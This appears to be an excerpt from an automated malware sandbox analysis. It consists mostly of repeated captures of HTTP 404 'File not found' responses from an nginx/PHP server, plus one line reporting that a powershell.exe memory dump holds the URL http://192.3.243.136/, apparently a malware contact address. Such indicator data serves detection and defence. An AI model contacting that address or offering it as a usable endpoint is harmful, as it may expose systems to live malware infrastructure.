Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 15 Nov 2024 17:14:38 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 15 Nov 2024 17:14:40 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 15 Nov 2024 17:14:41 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 15 Nov 2024 17:14:42 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 15 Nov 2024 17:14:43 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 15 Nov 2024 17:14:44 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 15 Nov 2024 17:14:47 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 15 Nov 2024 17:14:48 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 15 Nov 2024 17:14:49 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 15 Nov 2024 17:14:50 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 15 Nov 2024 17:14:51 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 15 Nov 2024 17:14:52 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 15 Nov 2024 17:14:54 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 15 Nov 2024 17:14:55 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 15 Nov 2024 17:14:56 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 15 Nov 2024 17:14:57 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 15 Nov 2024 17:14:59 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 15 Nov 2024 17:15:00 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 15 Nov 2024 17:15:01 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 15 Nov 2024 17:15:02 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 15 Nov 2024 17:15:03 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 15 Nov 2024 17:15:04 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 15 Nov 2024 17:15:05 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 15 Nov 2024 17:15:07 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 15 Nov 2024 17:15:08 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 15 Nov 2024 17:15:09 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 15 Nov 2024 17:15:10 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 15 Nov 2024 17:15:11 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 15 Nov 2024 17:15:12 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 15 Nov 2024 17:15:13 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 15 Nov 2024 17:15:14 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 15 Nov 2024 17:15:16 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 15 Nov 2024 17:15:17 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 15 Nov 2024 17:15:18 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 15 Nov 2024 17:15:19 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 15 Nov 2024 17:15:20 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 15 Nov 2024 17:15:21 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 15 Nov 2024 17:15:23 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 15 Nov 2024 17:15:24 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 15 Nov 2024 17:15:25 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 15 Nov 2024 17:15:27 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 15 Nov 2024 17:15:28 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 15 Nov 2024 17:15:29 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 15 Nov 2024 17:15:30 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 15 Nov 2024 17:15:31 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 15 Nov 2024 17:15:33 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 15 Nov 2024 17:15:34 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 15 Nov 2024 17:15:35 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 15 Nov 2024 17:15:36 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 15 Nov 2024 17:15:37 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 15 Nov 2024 17:15:38 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 15 Nov 2024 17:15:39 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 15 Nov 2024 17:15:40 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 15 Nov 2024 17:15:41 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 15 Nov 2024 17:15:43 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 15 Nov 2024 17:15:44 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 15 Nov 2024 17:15:45 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 15 Nov 2024 17:15:46 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 15 Nov 2024 17:15:47 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 15 Nov 2024 17:15:48 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 15 Nov 2024 17:15:50 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 15 Nov 2024 17:15:52 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 15 Nov 2024 17:15:53 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 15 Nov 2024 17:15:54 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 15 Nov 2024 17:15:55 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 15 Nov 2024 17:15:57 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 15 Nov 2024 17:15:58 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 15 Nov 2024 17:15:59 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 15 Nov 2024 17:16:00 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 15 Nov 2024 17:16:01 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 15 Nov 2024 17:16:02 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 15 Nov 2024 17:16:04 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 15 Nov 2024 17:16:05 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.
Source: global traffic	HTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.26.1Date: Fri, 15 Nov 2024 17:16:06 GMTContent-Type: text/html; charset=UTF-8Content-Length: 23Connection: closeX-Powered-By: PHP/5.4.16Status: 404 Not FoundData Raw: 08 00 00 00 00 00 00 00 46 69 6c 65 20 6e 6f 74 20 66 6f 75 6e 64 2e Data Ascii: File not found.

Source: powershell.exe, 00000001.00000002.2191869063.000000000307C000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://192.3.243.136/
